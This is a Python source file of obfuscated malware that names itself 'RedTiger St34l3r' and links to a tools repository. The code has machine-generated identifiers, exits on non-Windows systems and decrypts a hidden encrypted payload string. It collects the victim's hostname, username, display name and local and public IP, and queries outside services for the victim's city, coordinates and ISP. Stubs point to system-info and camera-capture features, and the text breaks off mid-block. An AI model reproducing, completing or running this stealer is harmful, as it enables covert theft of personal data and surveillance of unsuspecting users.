
import sys

def SVIKLESWUQAYRVYRDRKWMULSENYPRGTIZNCAONJBNEAOOMCRLS():
    def PDJCVCHRRUSPKXSXLKOYQTMDAFWASQFWCJYZFLTMXLKIRVOKBCVVBWISNGQALICXOLCZGTKXBQPIWTTDWUVWPKPODUZEKGEDKA():
        if sys.platform.startswith("win"):
            return False
        else:
            return True
    
    try: 
        FIONMNSZPTIRJEDWGEHCVXCQMPAQMIYBOVQOHIAWINGVQATQHFXPOCVIZQIBTVUNRFEDDNYATOTDRWYRGQAU = PDJCVCHRRUSPKXSXLKOYQTMDAFWASQFWCJYZFLTMXLKIRVOKBCVVBWISNGQALICXOLCZGTKXBQPIWTTDWUVWPKPODUZEKGEDKA()
        if FIONMNSZPTIRJEDWGEHCVXCQMPAQMIYBOVQOHIAWINGVQATQHFXPOCVIZQIBTVUNRFEDDNYATOTDRWYRGQAU == True:
            return FIONMNSZPTIRJEDWGEHCVXCQMPAQMIYBOVQOHIAWINGVQATQHFXPOCVIZQIBTVUNRFEDDNYATOTDRWYRGQAU
    except:
        return True
    
if SVIKLESWUQAYRVYRDRKWMULSENYPRGTIZNCAONJBNEAOOMCRLS() == True:
    sys.exit()
    
import os
import socket
import win32api
import requests
import base64
import ctypes
import threading
import discord
import zipfile
import io
from json import loads
from urllib.request import urlopen
from cryptography.hazmat.primitives import hashes
from cryptography.hazmat.primitives.kdf.pbkdf2 import PBKDF2HMAC
from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes
from cryptography.hazmat.primitives import padding
from cryptography.hazmat.backends import default_backend

def KSBSLDEZCCQTZQEUKSCHGAXIKERROSZDXOSYYCTLYAXQDIVVVIBFXHBCOEYYULSGJGLEAHZQVVWGCSR(KAABPUGAIVJYDFOYONXROKNRSJAQQDTGTCYRBCCQMOSHUVQPRDBLNWGCYOQNJNOPWHSAA): 
    FIONMNSZPTIRJEDWGEHCVXCQMPAQMIYBOVQOHIAWINGVQATQHFXPOCVIZQIBTVUNRFEDDNYATOTDRWYRGQAU_system_info = None
    return FIONMNSZPTIRJEDWGEHCVXCQMPAQMIYBOVQOHIAWINGVQATQHFXPOCVIZQIBTVUNRFEDDNYATOTDRWYRGQAU_system_info

def AAZJTVXPHCFYDKSXIZGLSWOGSGDUIKYMSPKUHAEKVXJFDUMSYVUAAODESOSCFSRFKBXNZSIYCAHLMRC(KAABPUGAIVJYDFOYONXROKNRSJAQQDTGTCYRBCCQMOSHUVQPRDBLNWGCYOQNJNOPWHSAA):
    VVPMPWMCHFVHDYLYGBYHJBADIILAKRYQFRGZAJBQIGTDQCNROZNHQEKWABLQHSGGCBIMDBRATDGJCLGNVGYXVGR = None
    return VVPMPWMCHFVHDYLYGBYHJBADIILAKRYQFRGZAJBQIGTDQCNROZNHQEKWABLQHSGGCBIMDBRATDGJCLGNVGYXVGR

def AXIHCNNFFPCUHJOOVISNLNSKTRSPVJLGUCPMRPOFLLYEMOUILOUYONVGGKKHGSCZWCQZLNASSICGGWUKMCXHWZTQSWRL(KAABPUGAIVJYDFOYONXROKNRSJAQQDTGTCYRBCCQMOSHUVQPRDBLNWGCYOQNJNOPWHSAA):
    KBHJBEGMWJWWECDRJYIKLFFSTAVPDLFCJJXUPLEREQAJTPGNWCGJTZDWSWWDABSCMTBPPYXEWIQEEMEOLLQMZJLSMQSAZRNENUIW = None
    return KBHJBEGMWJWWECDRJYIKLFFSTAVPDLFCJJXUPLEREQAJTPGNWCGJTZDWSWWDABSCMTBPPYXEWIQEEMEOLLQMZJLSMQSAZRNENUIW

def ZUESDUQYPMKFSFXCNGGDYOQRLVGTCJYBNHYNZJTJWIUCZURNMEUAHNFCKEKKBZYURKNKBIUESCPNBSTIXCXWKSSWCBYB(): 
    GJCOSDQIOCJXKBAZIOHDELXGTNALRIMKIFMRDTMZYAZNGRXGZUR = None
    return GJCOSDQIOCJXKBAZIOHDELXGTNALRIMKIFMRDTMZYAZNGRXGZUR

def ZYVURKSRUJTMAINLEHXOTBFAZNGBTDFWZJJXKWIDKZTJYILNFRGEQRTWXXQJ(KAABPUGAIVJYDFOYONXROKNRSJAQQDTGTCYRBCCQMOSHUVQPRDBLNWGCYOQNJNOPWHSAA): 
    FVOYGGGAHTJPPVFMQGIKULUUQDSGPDAFYNMWMRKPTEPMVMCTWKYDIRLEIV = None
    HNKWRWGVUGNUXLTLCPCTMRTGZLCXGDGMRPKLOIRQNQVFAIWKWFLQWTLZZALDNAURI = None
    IHCBCVRXRMSNSVCOWUDQHBZHXGXMQJFNAOEYTEDQLRWALUJRNWWGHEZHGMQOXUOFGFGPCOMUKVHYMIXEUTXJYCAHKXZWQAESZM = None
    RFFEVRECBGHKVKDKKIMVSOFAZMWNXFYVWIOAHEQPAZAFUAIMZITOININOCRHOIYLEMPVVXQXFEQAKTCHLHZNPYWTH = None
    CGWZLBWYWNIGQANSVCCQHLEXYNEOSVKAXVRWMAFSXKQGCACMWW = None
    HFHCFBULFLUBOVIEKWIWBHHHSTDERRTVDCKDVCHNIJHONJLPVSRKSIPCZWIXRKPAHTKE = None
    return FVOYGGGAHTJPPVFMQGIKULUUQDSGPDAFYNMWMRKPTEPMVMCTWKYDIRLEIV, HNKWRWGVUGNUXLTLCPCTMRTGZLCXGDGMRPKLOIRQNQVFAIWKWFLQWTLZZALDNAURI, IHCBCVRXRMSNSVCOWUDQHBZHXGXMQJFNAOEYTEDQLRWALUJRNWWGHEZHGMQOXUOFGFGPCOMUKVHYMIXEUTXJYCAHKXZWQAESZM, RFFEVRECBGHKVKDKKIMVSOFAZMWNXFYVWIOAHEQPAZAFUAIMZITOININOCRHOIYLEMPVVXQXFEQAKTCHLHZNPYWTH, CGWZLBWYWNIGQANSVCCQHLEXYNEOSVKAXVRWMAFSXKQGCACMWW, HFHCFBULFLUBOVIEKWIWBHHHSTDERRTVDCKDVCHNIJHONJLPVSRKSIPCZWIXRKPAHTKE

def XJJISHODTWDDGYSIINTYPFKGZIERVJTMTIPKPIVDOXYQTWTJJKWONQUCESVYSCVEIIUUZNAK(KAABPUGAIVJYDFOYONXROKNRSJAQQDTGTCYRBCCQMOSHUVQPRDBLNWGCYOQNJNOPWHSAA):
    XMFDBDUSVYLDUVHNZKRTBERIKVVYOLBPKFETYIHVJLXQVBWEJJBUPPSSYFNOYOBVOETJ = None
    KCDGBHPSGKKTQUKPGJUAZHFQWPCUXDEIVPUTDFGUAUTGDYYAPVYTKYMKNEUZX = None
    VSGWGQOLXHAAGSNFMZGBIISMUFXNFGUXJNBSZCQUWGBTKGFQAZXOUJCXCF = None
    return XMFDBDUSVYLDUVHNZKRTBERIKVVYOLBPKFETYIHVJLXQVBWEJJBUPPSSYFNOYOBVOETJ, KCDGBHPSGKKTQUKPGJUAZHFQWPCUXDEIVPUTDFGUAUTGDYYAPVYTKYMKNEUZX, VSGWGQOLXHAAGSNFMZGBIISMUFXNFGUXJNBSZCQUWGBTKGFQAZXOUJCXCF

def LBGXGCJRRDXLCCAXSZJICLYWXELONUOOKJCZEZLJFIFRTZBVNWGGUDUIPEJMIXVFZKNKNDFRMJRNUMQODD(KAABPUGAIVJYDFOYONXROKNRSJAQQDTGTCYRBCCQMOSHUVQPRDBLNWGCYOQNJNOPWHSAA):
    IQXWQHNXGQTZQTDECCDZOFLQILKZQFCVGHIMMFJHQBHBBGLVCURREQOUASCMRECFSCNZPSLLRAWTZRZX = None
    return IQXWQHNXGQTZQTDECCDZOFLQILKZQFCVGHIMMFJHQBHBBGLVCURREQOUASCMRECFSCNZPSLLRAWTZRZX

def WWQLNSZYESPSVXUWFAEDJVTSGSBDJGWXQFVHWZWFWFAQNSEBFVJGNACLSEEODJQXITAVJZDEFRY(KAABPUGAIVJYDFOYONXROKNRSJAQQDTGTCYRBCCQMOSHUVQPRDBLNWGCYOQNJNOPWHSAA):
    FIONMNSZPTIRJEDWGEHCVXCQMPAQMIYBOVQOHIAWINGVQATQHFXPOCVIZQIBTVUNRFEDDNYATOTDRWYRGQAU_camera_capture = None
    return FIONMNSZPTIRJEDWGEHCVXCQMPAQMIYBOVQOHIAWINGVQATQHFXPOCVIZQIBTVUNRFEDDNYATOTDRWYRGQAU_camera_capture

def FLUNLXWVDPYFYVWZOSCKPSSWRIULNUFMRHFQCWTGYVSHLGGGRTJPZLVKEXMWZJBLRKUMTEKHTGGK(KAABPUGAIVJYDFOYONXROKNRSJAQQDTGTCYRBCCQMOSHUVQPRDBLNWGCYOQNJNOPWHSAA): 
    OPMKBJJNBCTKRGADXVZZUCNZYMRYNSCEMXYUMLEMWIVZKMRUTGTTIOKMFMGMYGFTHYVIDRSOICJJQOED = None
    return OPMKBJJNBCTKRGADXVZZUCNZYMRYNSCEMXYUMLEMWIVZKMRUTGTTIOKMFMGMYGFTHYVIDRSOICJJQOED

def UMLUCSXPNYEKHRDXOHNNCTVWABIDPSHDASWQHGOTAMVQSHJZCMBESQJCFDONVA(): pass
def ESYVFYPORILATCINOSXYLOBTURCSNQBCKASKHDAYIPBQIXTJCJMPNZNYFYUPAVDRYJOIDCAREETWHZFIHIFSECJH(): pass
def KXVONBQFRFWKHUWVVBTGBAQBERZYUXQPFTWJXMLCSMNMPKOISBCAMIZIQFMKSUXGYDKILXSZTOM(): pass
def VZGBXNZVHECOUGTZEDPHSRCGPPWLAEENZKWAVHBQFRZQSXPZXEBPPSXAVFHFEDIZKSCALV(): pass
def QABPYRPNILIURWJVLJORJCTZXYCOOVKELBTGWQASMCHFDHQYOWEIBOUMONCOCJFAHDZMQIRPRROCFQUGGM(): pass
def YSEWBTZZJRZKQQTVZANYGFMYUGAKFJOUTXQLGNQUIIUQEMAMMPVIDLWXPKWGTHBSBBEYKZNXYKQINWECPSNELYWQCXVPNGOJNZ(): pass
def CEPQHCYDTKNMOGCNWFFIHQDNZGSOCVMOFPWEGJHSQNPHEOTHBBZKRYNHCGHGXAVOQFOVMPTZBCETA(): pass
def JUYDCPIFJCAOUPOIALJTWRDSZZMZBOFSXHDXQDCSRIIQRCXSBESAHNXDTOTSZPLDWXPOCNOBBYSI(): pass
def KROCZTJGXPOTQCNCFAYMYSUXGTSBFSPLJABTWHOOXCTAWBVGPKYGASYMDZULWCIHYLULHFBQRVGTCZOXHUYTAWXVMSOOWSM(): pass
def YWKUMCHVDMUMCYUELIHXZLSQFHNSDGYZSVGEPBMCKYMMLSISJWPUGLBDACIRDEEMIIZLWEKNWIZ(): pass
def PDZUIZPJAJEYCDYWUUNYBTZJAGSXDUBQIWVVFEIIIDZDFBFOYXWVAGKEFAUXRSNZWSWLVSHRZMF(): pass
def AKJFXABOFUBVWJWHKSJEKYFYWHUNZJUVOXOGHIRXBPZZXGWSYSBHSNXOHJWIPWXPGDFZSYGLMCE(): pass

def YVIGKBUBCCHULFNMCPQLTPSLSMCEDKLRRJFDAIQTKJTBWHXFXVVCBILDDIIMTYMEWYRX(title):
    try:
        if sys.platform.startswith("win"):
            ctypes.windll.kernel32.SetConsoleTitleW(title)
        elif sys.platform.startswith("linux"):
            sys.stdout.write(f"\x1b]2;{title}\x07")
    except:
        pass
        
def CPLWPLLRWOICCCHGAVXQZMAODXKDWUHCIDRZBIWXSWJBGMHOXTCNTJZXTJPFLCAIO():
    try:
        if sys.platform.startswith("win"):
            os.system("cls")
        elif sys.platform.startswith("linux"):
            os.system("clear")
    except:
        pass

def TLXUTQJMRDLYGDUGCTIUWOIVDCJVWUNVOLDLXUTZJMKFAISUBOKNKFLOIQUHTYTLKLGIXXLUMPMKINICKGFMEU(KYOYUJHJDMRRXSRTHTJOJBTTSXORCUNHZLMSVJBRFPLMGGBPAKWGYNBUYUGNDIAPSLQV, JZSJIEBZYHZGCRNTFAADILTJTZZFUWTQTKIRFJAICEZHECSKARUWZPGTCYEZRYWFTIMLBPVZDJXMNAOQCZPBHQWHYMW):
    def RCEJSQZAGEHHMKOHQBBJMILIPNFFGXZOFYOIAVEHHWZIRXRNIA(AALJAILZPCTPXSHIMTDUYVUOMAGETVXMGVOMVFFFIZSZLPWQBRQOLYAURQUJFRQICQZRTZNHYEZHUTJJOOFWNA, XDBTIRWRBQHOGCTOSGETREXJWBWPZBDSXJUMBLAOIGHZRVTYXXVABQDHIYGEQAOVDBUEWASYEYSYLYCK):
        PCZGVVBERPNZPITUMUUVRKTCAVHZMYAIPLDUTJIBIGSRSHSLUY = PBKDF2HMAC(algorithm=hashes.SHA256(), length=32, salt=XDBTIRWRBQHOGCTOSGETREXJWBWPZBDSXJUMBLAOIGHZRVTYXXVABQDHIYGEQAOVDBUEWASYEYSYLYCK, iterations=100000, backend=default_backend())
        if isinstance(AALJAILZPCTPXSHIMTDUYVUOMAGETVXMGVOMVFFFIZSZLPWQBRQOLYAURQUJFRQICQZRTZNHYEZHUTJJOOFWNA, str):  
            AALJAILZPCTPXSHIMTDUYVUOMAGETVXMGVOMVFFFIZSZLPWQBRQOLYAURQUJFRQICQZRTZNHYEZHUTJJOOFWNA = AALJAILZPCTPXSHIMTDUYVUOMAGETVXMGVOMVFFFIZSZLPWQBRQOLYAURQUJFRQICQZRTZNHYEZHUTJJOOFWNA.encode()  
        return PCZGVVBERPNZPITUMUUVRKTCAVHZMYAIPLDUTJIBIGSRSHSLUY.derive(AALJAILZPCTPXSHIMTDUYVUOMAGETVXMGVOMVFFFIZSZLPWQBRQOLYAURQUJFRQICQZRTZNHYEZHUTJJOOFWNA)

    KYOYUJHJDMRRXSRTHTJOJBTTSXORCUNHZLMSVJBRFPLMGGBPAKWGYNBUYUGNDIAPSLQV_data = base64.b64decode(KYOYUJHJDMRRXSRTHTJOJBTTSXORCUNHZLMSVJBRFPLMGGBPAKWGYNBUYUGNDIAPSLQV)
    XDBTIRWRBQHOGCTOSGETREXJWBWPZBDSXJUMBLAOIGHZRVTYXXVABQDHIYGEQAOVDBUEWASYEYSYLYCK = KYOYUJHJDMRRXSRTHTJOJBTTSXORCUNHZLMSVJBRFPLMGGBPAKWGYNBUYUGNDIAPSLQV_data[:16]
    KUKJDSPRPXAKQIXWDORHEDGGQDPCKQWIYNGARUCOTPXPBHPBAZOZHNDHIX = KYOYUJHJDMRRXSRTHTJOJBTTSXORCUNHZLMSVJBRFPLMGGBPAKWGYNBUYUGNDIAPSLQV_data[16:32]
    KYOYUJHJDMRRXSRTHTJOJBTTSXORCUNHZLMSVJBRFPLMGGBPAKWGYNBUYUGNDIAPSLQV_data = KYOYUJHJDMRRXSRTHTJOJBTTSXORCUNHZLMSVJBRFPLMGGBPAKWGYNBUYUGNDIAPSLQV_data[32:]
    UMZXOLCZJGMZKDOVLSXWVPHPVJYMVPPNUKELIYKRMBUISNTJAZUNEPYYMTVQEJT = RCEJSQZAGEHHMKOHQBBJMILIPNFFGXZOFYOIAVEHHWZIRXRNIA(JZSJIEBZYHZGCRNTFAADILTJTZZFUWTQTKIRFJAICEZHECSKARUWZPGTCYEZRYWFTIMLBPVZDJXMNAOQCZPBHQWHYMW, XDBTIRWRBQHOGCTOSGETREXJWBWPZBDSXJUMBLAOIGHZRVTYXXVABQDHIYGEQAOVDBUEWASYEYSYLYCK)
    CPNCAUOBSLDEFXNSMSGQHRDIUEPHISQPPVZWPRGXCISGLJOEGQMUMRRFCPMMTPGERCRXBJBLUZUXGVQHMYAPEPBBJL = Cipher(algorithms.AES(UMZXOLCZJGMZKDOVLSXWVPHPVJYMVPPNUKELIYKRMBUISNTJAZUNEPYYMTVQEJT), modes.CBC(KUKJDSPRPXAKQIXWDORHEDGGQDPCKQWIYNGARUCOTPXPBHPBAZOZHNDHIX), backend=default_backend())
    THXOVJPWBWBPVEYAZRNIZKUZNPMMNVVNMNCGMENKQVGUIVDSLHTZRZJLTCLBXVULHDVPEWMDKKZUORKA = CPNCAUOBSLDEFXNSMSGQHRDIUEPHISQPPVZWPRGXCISGLJOEGQMUMRRFCPMMTPGERCRXBJBLUZUXGVQHMYAPEPBBJL.decryptor()
    CBZRILWJMOZTTNWWZGCOPTQSZXONAYYLCUUOYXBQKTXJRTHVTMEANFKWUJGDFQTICLCAPRCLX = THXOVJPWBWBPVEYAZRNIZKUZNPMMNVVNMNCGMENKQVGUIVDSLHTZRZJLTCLBXVULHDVPEWMDKKZUORKA.update(KYOYUJHJDMRRXSRTHTJOJBTTSXORCUNHZLMSVJBRFPLMGGBPAKWGYNBUYUGNDIAPSLQV_data) + THXOVJPWBWBPVEYAZRNIZKUZNPMMNVVNMNCGMENKQVGUIVDSLHTZRZJLTCLBXVULHDVPEWMDKKZUORKA.finalize()
    XDARTKGLQLMQADFRRGWGPYQUBAGQAMBFNEIYTAIZLVNLKKTIYGDOEYQSEKGHDSPIWQUFBBFWWB = padding.PKCS7(128).unpadder()
    CACLTAVCXOGIKNPJQRISLUROAUOIMMCRYISRJLXOCAQEYNZEKFBRKMVKABXUIUFSBRSBEBJEUCGR = XDARTKGLQLMQADFRRGWGPYQUBAGQAMBFNEIYTAIZLVNLKKTIYGDOEYQSEKGHDSPIWQUFBBFWWB.update(CBZRILWJMOZTTNWWZGCOPTQSZXONAYYLCUUOYXBQKTXJRTHVTMEANFKWUJGDFQTICLCAPRCLX) + XDARTKGLQLMQADFRRGWGPYQUBAGQAMBFNEIYTAIZLVNLKKTIYGDOEYQSEKGHDSPIWQUFBBFWWB.finalize()
    return CACLTAVCXOGIKNPJQRISLUROAUOIMMCRYISRJLXOCAQEYNZEKFBRKMVKABXUIUFSBRSBEBJEUCGR.decode()

YVIGKBUBCCHULFNMCPQLTPSLSMCEDKLRRJFDAIQTKJTBWHXFXVVCBILDDIIMTYMEWYRX("")

try: HLLPLDJQJQOPNSAOGEOPSPVKMIZESBEXMHQZVJOZMCHTWKTGNUEJZAUWHSIDUYAOBDVBKBHWYFPGAEVDBFZLALUQSRDVOBGNNMDO    = socket.gethostname()
except: HLLPLDJQJQOPNSAOGEOPSPVKMIZESBEXMHQZVJOZMCHTWKTGNUEJZAUWHSIDUYAOBDVBKBHWYFPGAEVDBFZLALUQSRDVOBGNNMDO = "None"

try: GUHUDRUFCEGYZVTEKWIPROLLTXXIAHPKEAFWWKPFPWODGQRZANTOYDPPNZVKKMZLDGKPZCFLFZEIMTREWKXGRPIZYMCKGP    = os.getlogin()
except: GUHUDRUFCEGYZVTEKWIPROLLTXXIAHPKEAFWWKPFPWODGQRZANTOYDPPNZVKKMZLDGKPZCFLFZEIMTREWKXGRPIZYMCKGP = "None"

try: TVAVMKPTPPIHBJGRSDEAWYSOYXVLKKWGOWFIQKCNXOPRKDJUVYLKEDRXMRZCHMDOGQGKMJKOOG    = win32api.GetUserNameEx(win32api.NameDisplay)
except: TVAVMKPTPPIHBJGRSDEAWYSOYXVLKKWGOWFIQKCNXOPRKDJUVYLKEDRXMRZCHMDOGQGKMJKOOG = "None"

try: TAFFLSINABOFUAWWYUDFQMFDBLESGMTTCSELRKNWWJQBKZYHRLWKEXQPNFAUHIEDBRDLULHIWWCRLYBPKLSBMMDLLSQUVSYDH    = requests.get("https://api.ipify.org?format=json").json().get("ip", "None")
except: TAFFLSINABOFUAWWYUDFQMFDBLESGMTTCSELRKNWWJQBKZYHRLWKEXQPNFAUHIEDBRDLULHIWWCRLYBPKLSBMMDLLSQUVSYDH = "None"

try: WQICKGMIKTKZVFSKRDXYHDVJNUMRRQPYWZPLCYLUOMZEXGUMJDSAILTD    = socket.gethostbyname(socket.gethostname())
except: WQICKGMIKTKZVFSKRDXYHDVJNUMRRQPYWZPLCYLUOMZEXGUMJDSAILTD = "None"

WEQCJZSAPCXFRBUXXRBRLIURRTZTBEYXVGBZUOGUPFDZLHZSCZSNMDFWRVBYKSKNEFKWOHFPQDKGUXO = r"""
u6tJlpFT1tOYZns4WAeLfukqAcWo5MjFEVV83ZIAV/+kRm185kXg3cZzV8BgElmOWyn5pfuDsujNARZRKR7kirZc6KKyLNSYaI/A90VpIgzuIj2G7gNMUCsird6WBLmFGrPdOF/Dybgdju0iMZC0luFaHc+Rz2oVUF1XpaD7Lmz8oc8JSmIq7JJnS7IvVbgvpfOmjmbCDVWUGbyIcQMd4g==
"""

QATLFOLQRJXOIOVMERTBQKOOTLIJWTVDTPCGRPPQOOCZKTSGRTIHFGXOVKLFHETNIFXALAIL            = "EsPkFJnfHTifFMIPfvFghwjGLUUeQoHfVQtYEioraEbRBWFRMjsScmBLpajlPHccHztVchBnIxWsNEzzjHVOipclFuMAPSMdMWimGRZqvFrkCkCGEcOqKUvdpfJADjdXxQhminRKdhSy"
FSDJHXRDGYWHXMAQLXRQQAMQAEJJIVDSKGQECBMOZRDTJTXJJJGHPMJUQIJVWIE        = "None"
YNXDYLNNLXXBSOYGPDWRPNKDVCVNMQIWXLBCGFGQBWSCPVCUMYPUEN    = 0xa80505
BABMQIGUZFXUYWNPCSXFJVHWLRBDQMHVFSSBHSQWEVGXKDXFJLPTPYTZXTQZRMATNUWIJBFIVVGMGNEWVRREDYGWQXDRVDL = "RedTiger St34l3r"
ACFESDPMYEXDCVNURJEFLDWOYUCGUSMYUHTJDOMWCJOYZDQBAGRUZRBFSKQFOARUSXLCMBDSPTMRUWUAHUDBO   = "https://google.com"
MMTBWOCADOKKYVLHYBFJTMTXAYISZXXCIWKJUWEJXHLTJFMJDJBKLMBVCTJYKDCAUXCSTJAIMDVVZOHWFYB    = "RedTiger St34l3r - github.com/loxy0dev/RedTiger-Tools"
KTBMADAQAXNSPJLPJTAGKYDHIBNQWVGXNKAIKUYICFVSYWPUBDHKNXZNIOYUEVLKZIEJDGEHHDUOQTYXNMIKCYCKBIQGELX   = {"text": MMTBWOCADOKKYVLHYBFJTMTXAYISZXXCIWKJUWEJXHLTJFMJDJBKLMBVCTJYKDCAUXCSTJAIMDVVZOHWFYB, "icon_url": ACFESDPMYEXDCVNURJEFLDWOYUCGUSMYUHTJDOMWCJOYZDQBAGRUZRBFSKQFOARUSXLCMBDSPTMRUWUAHUDBO}
TMBICQRTGLDXBMWSBFEGBNRTVJQWFAWVFPLNLIRKORKCLMTMXQFQAQTYICWIRVPZFFKTFYSESIOKQR    = f'`{GUHUDRUFCEGYZVTEKWIPROLLTXXIAHPKEAFWWKPFPWODGQRZANTOYDPPNZVKKMZLDGKPZCFLFZEIMTREWKXGRPIZYMCKGP} "{TAFFLSINABOFUAWWYUDFQMFDBLESGMTTCSELRKNWWJQBKZYHRLWKEXQPNFAUHIEDBRDLULHIWWCRLYBPKLSBMMDLLSQUVSYDH}"`'
UVUTRMNXKVMWXPSUNUXNQHIZZCWIHUYAMWPNAKVCZHIQVGAOHNXGXTKRRDUMDVJ    = TLXUTQJMRDLYGDUGCTIUWOIVDCJVWUNVOLDLXUTZJMKFAISUBOKNKFLOIQUHTYTLKLGIXXLUMPMKINICKGFMEU(WEQCJZSAPCXFRBUXXRBRLIURRTZTBEYXVGBZUOGUPFDZLHZSCZSNMDFWRVBYKSKNEFKWOHFPQDKGUXO, QATLFOLQRJXOIOVMERTBQKOOTLIJWTVDTPCGRPPQOOCZKTSGRTIHFGXOVKLFHETNIFXALAIL)

MANZUSRYZGXILEYWITAXTHOTSFRYUQGLIMFQEKBORPFQKPHDSRGNPOPDIOSCFRT           = os.getenv("WINDIR", None)
IWADTVHCSTCICBZUMNRMSBPZVAYOGAAPWCYMPAAVKHNIZGTVQCXBMDJUHWDOFWHBRYDMBLGQJFCPEEJPFVDOBOWBVJ       = os.getenv('USERPROFILE', None)
MJITONZPWBXPSWJQNHTKUATGKJUCDGQLMKFKAMBXKHJCFCQVTTDZH     = os.getenv('LOCALAPPDATA', None)
BYOCOLMLQZNZUJZGDEJEXCOTMZVZUITWGWJZFJSXNJMXLCGGMMPBOZHWPMFRUQUDEHOARFCOTVPJA   = os.getenv('APPDATA', None)
WDAOHJTFPRZITMPQODRTYULCJTGGORASGJTELRTWGZFSMBEDFHUOJGPOSOOMAQIEZNGFAWTWDJYRWAIBZXNVRRYENJRGFQJR = os.getenv('ProgramFiles(x86)', None)
if WDAOHJTFPRZITMPQODRTYULCJTGGORASGJTELRTWGZFSMBEDFHUOJGPOSOOMAQIEZNGFAWTWDJYRWAIBZXNVRRYENJRGFQJR is None:
    WDAOHJTFPRZITMPQODRTYULCJTGGORASGJTELRTWGZFSMBEDFHUOJGPOSOOMAQIEZNGFAWTWDJYRWAIBZXNVRRYENJRGFQJR = os.getenv('ProgramFiles', None)

try:
    HQXKIYCZKJBJMLHUYURPYFKISSNNEYFNTXBGAIFOODGSTMKSWAQPUQOBIKPMAOHXNPZLPRELKNWZXINZGICW = requests.get(f"https://{FSDJHXRDGYWHXMAQLXRQQAMQAEJJIVDSKGQECBMOZRDTJTXJJJGHPMJUQIJVWIE}/api/ip/ip={TAFFLSINABOFUAWWYUDFQMFDBLESGMTTCSELRKNWWJQBKZYHRLWKEXQPNFAUHIEDBRDLULHIWWCRLYBPKLSBMMDLLSQUVSYDH}")
    VBHXHEIRZAXFLGZQMZUNJMXCBSVRDWAFMTKMEBYBNKIAXFJXVEFAVIQESZPP = HQXKIYCZKJBJMLHUYURPYFKISSNNEYFNTXBGAIFOODGSTMKSWAQPUQOBIKPMAOHXNPZLPRELKNWZXINZGICW.json()

    NJMHHGCNQKAYJYHVDMZKFEGVTZWSOVRBMPSQASKBVLLQYUHZBHWQDORWEXNDGVS = VBHXHEIRZAXFLGZQMZUNJMXCBSVRDWAFMTKMEBYBNKIAXFJXVEFAVIQESZPP.get('country', "None")
    NJMHHGCNQKAYJYHVDMZKFEGVTZWSOVRBMPSQASKBVLLQYUHZBHWQDORWEXNDGVS_code = VBHXHEIRZAXFLGZQMZUNJMXCBSVRDWAFMTKMEBYBNKIAXFJXVEFAVIQESZPP.get('country_code', "None")
    SVZVLHZGORSOCSZNTRZIGEDMYHTIUIQEPZOPTAGUWNNBXAHZYSXJGFYLMOKZLDFPBLFEKEWEIAVTLTRVQYXWQRVTNMKN = VBHXHEIRZAXFLGZQMZUNJMXCBSVRDWAFMTKMEBYBNKIAXFJXVEFAVIQESZPP.get('region', "None")
    SVZVLHZGORSOCSZNTRZIGEDMYHTIUIQEPZOPTAGUWNNBXAHZYSXJGFYLMOKZLDFPBLFEKEWEIAVTLTRVQYXWQRVTNMKN_code = VBHXHEIRZAXFLGZQMZUNJMXCBSVRDWAFMTKMEBYBNKIAXFJXVEFAVIQESZPP.get('region_code', "None")
    OCUHPSJOFCKJILPFOUIRAMYBZEGKKCVWGVMMNNHTLZGUXLONUVUXNLMRUHIKMHGSADSRVQTBTSWZUZAQQWZBCZ = VBHXHEIRZAXFLGZQMZUNJMXCBSVRDWAFMTKMEBYBNKIAXFJXVEFAVIQESZPP.get('zip', "None")
    OXKJGJYHLXZJOZMCAYMWOJNEGLCBACNCYTBBLFCWMXPEBDLVONYUADUYUSQHWEDPLFEZPSUBIUSNYITGTPIXKXAZDKZT = VBHXHEIRZAXFLGZQMZUNJMXCBSVRDWAFMTKMEBYBNKIAXFJXVEFAVIQESZPP.get('city', "None")
    EQIEETESNZCLVDMFTPRGAYNCANHMUDWVHSKBWMKCMUZOIVBEVKIEANMIVKNYWQTIVJVYHGZYVPKERWZAELQSFDFGLB = VBHXHEIRZAXFLGZQMZUNJMXCBSVRDWAFMTKMEBYBNKIAXFJXVEFAVIQESZPP.get('latitude', "None")
    IMFZQVGOVJNFACQJIUVOENHMVWWISXQTOQSFVCAFCIUGDKRXHVWCDPLEYBVCL = VBHXHEIRZAXFLGZQMZUNJMXCBSVRDWAFMTKMEBYBNKIAXFJXVEFAVIQESZPP.get('longitude', "None")
    KPMPPBEBUIWVURSXKMEXWDRZCJKBGJIUEXTDYOOETUCGOBTTDZEFRGAQJZSAZQPDQPMLVDJAOXIHFWGREECV = VBHXHEIRZAXFLGZQMZUNJMXCBSVRDWAFMTKMEBYBNKIAXFJXVEFAVIQESZPP.get('timezone', "None")
    EVJFAAYNLFSUWINPDXLGLPJEYFNFJDVNBXNENIIIEGVAWAHWCFWFMIPFCNECSTBBTYMSEWPFLWMRFNBLZDZWIOF = VBHXHEIRZAXFLGZQMZUNJMXCBSVRDWAFMTKMEBYBNKIAXFJXVEFAVIQESZPP.get('isp', "None")
    QYQGHBLSEZEPEBJOPBMYZDINRQTOXKZNJOXHVSVQCXOZZZFHVTPAROJOEVEBRSVIYWBXWQ = VBHXHEIRZAXFLGZQMZUNJMXCBSVRDWAFMTKMEBYBNKIAXFJXVEFAVIQESZPP.get('org', "None")
    XELCLIWFGHVGTXBBOHJYPPHUEZFXRMMGSIBCRPPWXDCPWLGTWJDUFQZCBMOYZEUEAMOPLSZNCBIPWV = VBHXHEIRZAXFLGZQMZUNJMXCBSVRDWAFMTKMEBYBNKIAXFJXVEFAVIQESZPP.get('as', "None")
except:
    HQXKIYCZKJBJMLHUYURPYFKISSNNEYFNTXBGAIFOODGSTMKSWAQPUQOBIKPMAOHXNPZLPRELKNWZXINZGICW = requests.get(f"http://ip-api.com/json/{TAFFLSINABOFUAWWYUDFQMFDBLESGMTTCSELRKNWWJQBKZYHRLWKEXQPNFAUHIEDBRDLULHIWWCRLYBPKLSBMMDLLSQUVSYDH}")
    VBHXHEIRZAXFLGZQMZUNJMXCBSVRDWAFMTKMEBYBNKIAXFJXVEFAVIQESZPP = HQXKIYCZKJBJMLHUYURPYFKISSNNEYFNTXBGAIFOODGSTMKSWAQPUQOBIKPMAOHXNPZLPRELKNWZXINZGICW.json()

    NJMHHGCNQKAYJYHVDMZKFEGVTZWSOVRBMPSQASKBVLLQYUHZBHWQDORWEXNDGVS = VBHXHEIRZAXFLGZQMZUNJMXCBSVRDWAFMTKMEBYBNKIAXFJXVEFAVIQESZPP.get('country', "None")
